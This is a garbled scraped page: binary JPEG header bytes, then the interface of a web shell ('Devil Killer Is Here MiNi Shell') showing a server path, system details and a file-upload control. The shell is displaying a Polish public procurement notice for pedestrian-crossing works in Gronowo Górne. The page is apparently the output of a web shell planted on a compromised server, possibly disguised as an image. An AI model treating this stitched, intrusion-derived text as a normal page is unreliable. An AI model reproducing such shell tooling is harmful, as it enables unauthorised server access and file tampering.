JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211110/0026447701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH<br/>W OBSZARZE ODDZIAŁYWANIA PRZEJŚĆ<br/>DLA PIESZYCH NA ULICY SZAFIROWEJ<br/>(DP 1139N) W GRONOWIE GÓRNYM </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Pasłęku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170818349</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pasłęk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdppaslek@zdppaslek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zdp.bip.powiat.elblag.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH<br/>W OBSZARZE ODDZIAŁYWANIA PRZEJŚĆ<br/>DLA PIESZYCH NA ULICY SZAFIROWEJ<br/>(DP 1139N) W GRONOWIE GÓRNYM </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c17fb19b-420a-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00264477</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003332/26/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.20 POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH W OBSZARZE ODDZIAŁYWANIA PRZEJŚĆ DLA PIESZYCH NA ULICY SZAFIROWEJ (DP 1139N) W GRONOWIE GÓRNYM</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdp.bip.powiat.elblag.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPuhttps://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej zdppaslek@zdppaslek.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencjielektronicznej<br/>przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz<br/>Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani/Pana danych<br/>osobowych jest Zarząd Dróg Powiatowych w Pasłęku;2) inspektorem ochrony danych osobowych w<br/>Ogłoszenie nr 2021/BZP 00237365/01 z dnia 2021-10-19<br/>2021-10-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Zarządzie DrógPowiatowych w Pasłęku jest Pani/Pani Marcin Andrusewicz, kontakt: adres emailiod@<br/>andrusewicz.pl. 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.<br/>c<br/>RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego,prowadzonym wtrybie przetargu nieograniczonego.4) odbiorcami Pani/Pana danych<br/>osobowych będą<br/>osoby lubpodmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74<br/>ustawy PZP.5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP.<br/>przezokres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowyprzekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6) obowiązek<br/>podaniaprzez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiemustawowym określonym w przepisanych ustawy PZP, związanym z udziałem w<br/>postępowaniu oudzielenie zamówienia publicznego.7) w odniesieniu do Pani/Pana danych osobowych<br/>decyzje niebędą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8) posiada<br/>Pani/Pan:a)na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(wprzypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmierniedużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mającychna celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;9) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODOprzetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DM.252.30.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 233299,50 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1<br/>Nazwa zamówienia nadana przez Zamawiającego:<br/>„POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH<br/>W OBSZARZE ODDZIAŁYWANIA PRZEJŚĆ<br/>DLA PIESZYCH NA ULICY SZAFIROWEJ<br/>(DP 1139N) W GRONOWIE GÓRNYM”<br/>4.2<br/>Nazwa i kod Wspólnego Słownika Zamówień (CPV):<br/>Główny przedmiot zamówienia: 45233261-6<br/>4.3<br/>Opis przedmiotu zamówienia:<br/>ZAŁOŻENIA OGÓLNE<br/>Projekt wykonawczy drogowy wykonano w celu wprowadzenia elementów bezpieczeństwa<br/>uczestników ruchu pieszego w obrębie przejść dla pieszych na ul. Szafirowej w Gronowie<br/>Górnym. Na projektowanym odcinku drogi zakłada się przebudowę trzech przejść dla pieszych i<br/>budowę jednego. Przejście w obrębie ul. Agatowej w km 0+197, 60 zostanie przeniesione o 6,40<br/>m do km 0+191,00. Przesunięcie jest podyktowane bliskością przejścia i skrzyżowania z ulicą<br/>podporządkowaną. Z uwagi na bliskość zatoki autobusowej przejście dla pieszych w obrębie<br/>skrzyżowania z ul. Topazową zostanie przeniesione z km 0+339, 90 do km 0+348, 90.<br/>Wszystkie przejścia zostaną wykonane w nawierzchni kostki brukowej betonowej grubości 8 cm<br/>koloru czerwonego (kostka bezfazowa) wyniesione ponad krawędź jezdni o 10 cm. Rampę<br/>najazdową wykonuje się na długości 1,20 m. Szerokość przejść dla pieszych wynosi 4,2 m<br/>oznakowanych malowaniem masą chemoutwardzalną. Najazd oznakować znakami poziomymi<br/>P-25 a przejście znakiem P-10. W odległości 2 m wykonać połówkowo oznakowanie w postaci<br/>znaków P-14. Oznakowanie wykonać od strony najazdu. Od strony dojścia dla pieszych<br/>pokonanie różnicy wysokości wyniesionego przejścia będzie wykonane skosem na długości 60<br/>cm. Wzdłuż krawężnika z dwóch rzędów kostki brukowej betowej grub 8 cm koloru czerwonego<br/>wykonany będzie ciek przykrawężnikowy. Ciek będzie miał szerokość 20 cm ze spadkiem nie<br/>mniejszym niż 0,3%. W celu zapewnienia prawidłowej komunikacji pieszych zostaną<br/>dostosowane dojścia i zaniżenia krawężników. Przed wejściem na przejście, w chodniku<br/>wykonany będzie rząd płytek integracyjnych 40x40x8 cm (kolor żółty) oddalonych 50 cm od<br/>krawężnika<br/>4.3.1<br/>Przebudowa przejść będzie polegała na:<br/>• wykonaniu robót rozbiórkowych<br/>• wykonaniu robót ziemnych – 129,799 m3<br/>• przebudowie ciągów pieszych z kostki brukowej bet. 8cm szarej / integracyjne żółte– 167,800<br/>m2<br/>• budowie wyniesionych przejść z kostki brukowej betonowej niefazowanej 8 cm kolor – 170,940<br/>m2<br/>• usunięciu oznakowania poziomego i rozebraniu oznakowania pionowego<br/>• wykonaniu oznakowania pionowego – 30 szt.<br/>• wykonaniu oznakowania poziomego farbami chlorokauczukowymi – 69,064 m2<br/>• wykonaniu oznakowania pionowego aktywnego – 2 szt.<br/>• wykonaniu tablic aktywnych „radar prędkości” – szt. 2<br/>• ustawieniu lamp hybrydowych solarno-wiatrowych – szt. 4<br/>• wykonaniu elementów odblaskowych „kocie oczy” – 56 szt.<br/>• montażu barier ochronnych stalowych N2 W2 – 8,00 m<br/>• wykonaniu humusowania z obsianiem – 64,000 m2<br/>• wymianie krawężników – 72,000 m<br/>• wymianie obrzeży – 60,100 m<br/>• remoncie elementów odwodnienia – cieki podchodnikowe – 1 kpl.<br/>4.3.2<br/>Zamówienie obejmuje przebudowę trzech i budowę jednego przejścia dla pieszych w Gronowie<br/>Ogłoszenie nr 2021/BZP 00237365/01 z dnia 2021-10-19<br/>2021-10-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Górnym z podziałem na 4 odrębne części. Wykonawcy składają oferty na wykonanie wszystkich<br/>4 zadań. Wykonawca w formularzu ofertowym (załącznik nr 1) podaje kwoty za wykonanie<br/>poszczególnych zadań oraz ich łączną sumę, która będzie dla Zamawiającego podstawą do<br/>wyboru oferty najkorzystniejszej. Zamawiający nie przewiduje podziału zamówienia na części.<br/>Zakres robót objętych zamówieniem:<br/>a) Zadanie nr 1: „POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH W OBSZARZE<br/>ODDZIAŁYWANIA PRZEJŚĆ DLA PIESZYCH NA ULICY SZAFIROWEJ (DP 1139N) W<br/>GRONOWIE GÓRNYM – PRZEBUDOWA PRZEJŚCIA DLA PIESZYCH NR 1 W KM 0+191,00”.<br/>b) Zadanie nr 2: POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH W OBSZARZE<br/>ODDZIAŁYWANIA PRZEJŚĆ DLA PIESZYCH NA ULICY SZAFIROWEJ (DP 1139N) W<br/>GRONOWIE GÓRNYM – PRZEBUDOWA PRZEJŚCIA DLA PIESZYCH NR 2 W KM 0+348,90”.<br/>c) Zadanie nr 3: POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH W OBSZARZE<br/>ODDZIAŁYWANIA PRZEJŚĆ DLA PIESZYCH NA ULICY SZAFIROWEJ (DP 1139N) W<br/>GRONOWIE GÓRNYM – BUDOWA PRZEJŚCIA DLA PIESZYCH NR 3 W KM 0+498,80”.<br/>d) Zadanie nr 4: POPRAWA BEZPIECZEŃSTWA RUCHU PIESZYCH W OBSZARZE<br/>ODDZIAŁYWANIA PRZEJŚĆ DLA PIESZYCH NA ULICY SZAFIROWEJ (DP 1139N) W<br/>GRONOWIE GÓRNYM – PRZEBUDOWA PRZEJŚCIA DLA PIESZYCH NR 4 W KM 0+348,90”.<br/>4.3.3<br/>Zgodnie z art. 310 pkt 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje<br/>możliwość unieważnienia postępowania o udzielenie zamówienia, jeżeli środki publiczne, które<br/>Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie<br/>zostały mu przyznane.<br/>4.3.4<br/>Wykonawca zobowiązany jest do wykonania wszystkich niezbędnych prac koniecznych do<br/>prawidłowego funkcjonowania przedmiotowego przedsięwzięcia w ramach kosztów<br/>przedstawionych w ofercie.<br/>4.3.5<br/>Wymagania dotyczące robót:<br/>1. wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi normami,<br/>warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż. zgodnie z zaleceniami<br/>Inspektora nadzoru,<br/>2. roboty należy prowadzić zgodnie z wymogami dokumentacji określającej przedmiot<br/>zamówienia, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz wymogami<br/>niniejszej SWZ,<br/>3. użyte materiały i urządzenia powinny być zgodne ze specyfikacją techniczną.<br/>Wymagania stawiane Wykonawcy:1) Wykonawca odpowiedzialny będzie za całokształt, w tym<br/>za przebieg oraz terminowe<br/>wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi i jakościowymi<br/>określonymi dla przedmiotu zamówienia.<br/>2) Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność<br/>profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia.<br/>3) Sporządzenie planu bezpieczeństwa i ochrony zdrowia.<br/>4) Spełnienie innych wymagań określonych we wzorze umowy oraz wynikających z<br/>obowiązujących przepisów prawa.<br/>4.3.6<br/>Wykonawca dla wypełnienia swoich zobowiązań powinien zapewnić doświadczone i<br/>wykwalifikowane osoby zdolne do prowadzenia wszelkich powierzonych zadań, uprawnione do<br/>kierowania robotami budowlanymi, zgodnie z obowiązującymi przepisami prawa i w zgodzie z<br/>postanowieniami odpowiednich decyzji, uzgodnieniami i opiniami, warunkującymi prawidłową<br/>realizację zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233261-6 - Roboty budowlane w zakresie przejść dla pieszych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">250 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający porówna i oceni na podstawie kryteriów merytorycznych, o<br/>których mowa w niniejszym rozdziale, jedynie oferty nie odrzucone. Za ofertę najkorzystniejszą<br/>zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach cena i okres<br/>gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa<br/>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie nie wcześniej niż<br/>ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną o wartości nie<br/>niższej niż 200.000,00 zł (brutto) lub dwie roboty o wartości nie niższej niż 100.000,00 zł każda,<br/>o charakterze porównywalnym z zakresem przedmiotu zamówienia. Za roboty porównywalne<br/>Zamawiający uznaje remont, budowę, przebudowę lub rozbudowę drogi publicznej.<br/>W przypadku oferty składanej wspólnie (art. 23 ustawy Pzp - konsorcjum) warunek udziału w<br/>postępowaniu wystarczy, że spełnił co najmniej jeden z wykonawców składających ofertę<br/>wspólną.<br/>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że dysponuje minimum jedną osobą<br/>na stanowisku kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności drogowej lub równoważne bez ograniczeń lub odpowiadające im<br/>Ogłoszenie nr 2021/BZP 00237365/01 z dnia 2021-10-19<br/>2021-10-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa,<br/>posiadającą co najmniej 3-letnie doświadczenie (licząc od dnia uzyskania uprawnień) w pracy<br/>na stanowisku kierownika budowy lub kierownika robót drogowych, w tym nadzór nad minimum<br/>jednym zadaniem związanym z wykonaniem remontu, budowy, przebudowy lub rozbudowy<br/>drogi publicznej o wartości nie niższej niż 200.000,00 zł (brutto) lub dwie roboty o wartości nie<br/>niższej niż 100.000,00 zł każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na 